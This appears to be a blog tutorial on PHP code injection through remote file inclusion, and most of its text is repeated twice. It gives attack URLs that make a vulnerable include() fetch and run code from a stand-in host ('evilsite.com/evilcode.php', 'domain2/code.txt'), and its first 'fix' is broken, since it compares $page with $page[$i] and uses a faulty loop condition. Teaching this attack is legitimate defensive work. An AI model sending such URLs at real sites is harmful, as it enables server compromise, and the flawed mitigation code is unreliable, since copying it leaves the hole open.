Injection
An injection attack typically occurs when input has not been validated. Injection attacks will provide some form of input and attach additional malicious data to perform some other or additional input or command. Injection attacks use an input medium to do something that the developer of the feature did not and would not normally expect.
Code Injection
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation
Example 1
If an application passes a parameter sent via a GET request to the PHP include() function with no input validation, the attacker may try to execute code other than what the developer had in mind.
The URL below passes a page name to the include() function.
http://testsite.com/index.php?page=contact.php
The file "evilcode.php" may contain, for example, the phpinfo() function which is useful for gaining information about the configuration of the environment in which the web service runs. An attacker can ask the application to execute his PHP code using the following request:
http://testsite.com/?page=http://evilsite.com/evilcode.php
How to test Code Injection
An attacker can create a 'txt' file on another server and have it included in the above example. If the attacker puts php code in this 'txt' file, it will be executed on the exploited host. <?php
phpinfo();
?>
Let's say the vulnerable code is located at 'http://domain/index.php', and the 'txt' file is located at 'http://domain2/code.txt', then the attacker would enter something like this into his browser: http://domain/index.php?page=http://domain2/code.txt
Then end result would have the exploited website execute the command 'phpinfo()' in between the header and footer where the php include is located.
Impact of Code Injection
The above example had harmless code being executed, but the attacker can execute more malicious code.
Solution/Mitigation of Code Injection:
There is a very simple solution to the above example, and that is to check the variable. In the above example, 99% of the time you know what values $page should be, and therefore can check to see if that is the case.
... html header ...
<?php
//list of valid pages
$pages=array("games/index.html", "news/news.html", "games/1.html");
//check $page variable
$valid=false;
for ($i=0; $i<sizeof($pages) || !$valid; $i++) {
if ($page==$page[$i]) {
$valid=true;
}
}
if ($valid) include($page);
if (!$valid) include($pages[0]); // include the first page if not valid
?>
... html footer ...
Another Solution:
Another solution is to check for invalid characters and setup all the page files in a seperate directory, all together.
Example of where the pages are placed:
pages/games.html
pages/news.html
pages/games-1.html
Code:
... html header ...
<?php
$invalidChars=array("/",".","\\","\"",";");
$page=str_replace($invalidChars,"",$page);
include ("pages/".$page.".html");
?>
... html footer ...
An injection attack typically occurs when input has not been validated. Injection attacks will provide some form of input and attach additional malicious data to perform some other or additional input or command. Injection attacks use an input medium to do something that the developer of the feature did not and would not normally expect.
Code Injection
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation
Example 1
If an application passes a parameter sent via a GET request to the PHP include() function with no input validation, the attacker may try to execute code other than what the developer had in mind.
The URL below passes a page name to the include() function.
http://testsite.com/index.php?page=contact.php
The file "evilcode.php" may contain, for example, the phpinfo() function which is useful for gaining information about the configuration of the environment in which the web service runs. An attacker can ask the application to execute his PHP code using the following request:
http://testsite.com/?page=http://evilsite.com/evilcode.php
How to test Code Injection
An attacker can create a 'txt' file on another server and have it included in the above example. If the attacker puts php code in this 'txt' file, it will be executed on the exploited host. <?php
phpinfo();
?>
Let's say the vulnerable code is located at 'http://domain/index.php', and the 'txt' file is located at 'http://domain2/code.txt', then the attacker would enter something like this into his browser: http://domain/index.php?page=http://domain2/code.txt
Then end result would have the exploited website execute the command 'phpinfo()' in between the header and footer where the php include is located.
Impact of Code Injection
The above example had harmless code being executed, but the attacker can execute more malicious code.
- An attacker can output the contents of any php file raw to the browser, where he can possibly obtain an sql login/password to your database.
- An attacker can use your website to send out large amounts of spam to various email addresses.
- An attacker can deface your website.
- An attacker can obtain private information.
- An attacker may gain access to the whole server.
Solution/Mitigation of Code Injection:
There is a very simple solution to the above example, and that is to check the variable. In the above example, 99% of the time you know what values $page should be, and therefore can check to see if that is the case.
... html header ...
<?php
//list of valid pages
$pages=array("games/index.html", "news/news.html", "games/1.html");
//check $page variable
$valid=false;
for ($i=0; $i<sizeof($pages) || !$valid; $i++) {
if ($page==$page[$i]) {
$valid=true;
}
}
if ($valid) include($page);
if (!$valid) include($pages[0]); // include the first page if not valid
?>
... html footer ...
Another Solution:
Another solution is to check for invalid characters and setup all the page files in a seperate directory, all together.
Example of where the pages are placed:
pages/games.html
pages/news.html
pages/games-1.html
Code:
... html header ...
<?php
$invalidChars=array("/",".","\\","\"",";");
$page=str_replace($invalidChars,"",$page);
include ("pages/".$page.".html");
?>
... html footer ...
No comments:
Post a Comment